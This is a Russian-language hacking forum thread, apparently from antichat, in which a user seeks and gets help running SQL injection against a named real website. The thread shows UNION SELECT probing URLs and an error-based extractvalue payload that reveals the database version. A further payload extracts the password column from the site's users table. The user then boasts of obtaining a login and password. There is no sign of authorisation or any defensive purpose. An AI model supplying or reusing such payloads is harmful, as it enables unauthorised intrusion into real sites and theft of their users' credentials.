Помогите доделать инъекцию сайта: http://worldwidestudies.org/ua/step/item/id/1

Вот что мне удалось проделать:

http://worldwidestudies.org/ua/step/item/id/9999999 UNION SELECT 1,2,3,4,5,6,7 --

Но никакие цифры не отображаются на сайте, но увидел что вместо "01 Вибір програми" отображается "{number} {title}", пробую писать следующее:

http://worldwidestudies.org/ua/step/item/id/9999999 UNION SELECT TABLE_NAME,2,3,4,5,6,7 FROM INFORMATION_SCHEMA.TABLES --

но сайт отображается как и раньше, вот и застрял на етом етапе, что делать не знаю, может здесь нет инъекции? А если есть, подскажите в каком направлении двигатся.

↑ (https://antichat.live/posts/3858528/)
Помогите доделать инъекцию сайта:
http://worldwidestudies.org/ua/step/item/id/1
Вот что мне удалось проделать:
http://worldwidestudies.org/ua/step/item/id/9999999 UNION SELECT 1,2,3,4,5,6,7 --
Но никакие цифры не отображаются на сайте, но увидел что вместо "01 Вибір програми" отображается "
{number} {title}
", пробую писать следующее:
http://worldwidestudies.org/ua/step/item/id/9999999 UNION SELECT TABLE_NAME,2,3,4,5,6,7 FROM INFORMATION_SCHEMA.TABLES --
но сайт отображается как и раньше, вот и застрял на етом етапе, что делать не знаю, может здесь нет инъекции? А если есть, подскажите в каком направлении двигатся.


попробуйте error-based


http://worldwidestudies.org/ua/step/item/id/1+and(extractvalue(1,concat(0x3a,version())))

Ето мы только что увидили какая версия БД используется?(XPATH syntax error: ':5.5.38')

И скинь мануал плз если есть на "ерор-базед", а то здесь нет: https://rdot.org/forum/showthread.php?t=124

И только что увидел вот: http://worldwidestudies.org/ua/step/item/id/9999999 UNION SELECT 1,2,3,4,5,6,7 FROM users --

Нашел что есть таблица с именем "users".

И нашел что есть столбцы(login,password): http://worldwidestudies.org/ua/step/item/id/9999999 UNION SELECT login,2,3,4,5,6,7 FROM users --

и вместо "login" можно еще постовить "password" и не выдает ошибки, но ошибки выдает когда пытаюсь вывести ето все на екран, вот таким образом: http://worldwidestudies.org/ua/step/item/id/9999999 UNION SELECT login,2,3,4,5,6,7 FROM users LIMIT 0,1 --

И на етом етапе застрял...

↑ (https://antichat.live/posts/3858547/)
Ето мы только что увидили какая версия БД используется?(XPATH syntax error: ':5.5.38')
И скинь мануал плз если есть на "ерор-базед", а то здесь нет:
https://rdot.org/forum/showthread.php?t=124
И только что увидел вот:
http://worldwidestudies.org/ua/step/item/id/9999999
UNION SELECT 1,2,3,4,5,6,7 FROM users --
Нашел что есть таблица с именем "users".
И нашел что есть столбцы(login,password):
http://worldwidestudies.org/ua/step/item/id/9999999 UNION SELECT login,2,3,4,5,6,7 FROM users --
и вместо "login" можно еще постовить "password" и не выдает ошибки, но ошибки выдает когда пытаюсь вывести ето все на екран, вот таким образом:
http://worldwidestudies.org/ua/step/item/id/9999999 UNION SELECT login,2,3,4,5,6,7 FROM users LIMIT 0,1 --

И на етом етапе застрял...




http://worldwidestudies.org/ua/step/item/id/1+and(extractvalue(1,concat(0x3a,(select%20passwor d%20from%20users%20limit%200,1))))

статей нет. тут вся суть в векторе и запросе, который вам нужен.

епать.... нету слов, моя первая инъекция, канешн не без помощи, нашел и логин - методом подстановки. Спасибо!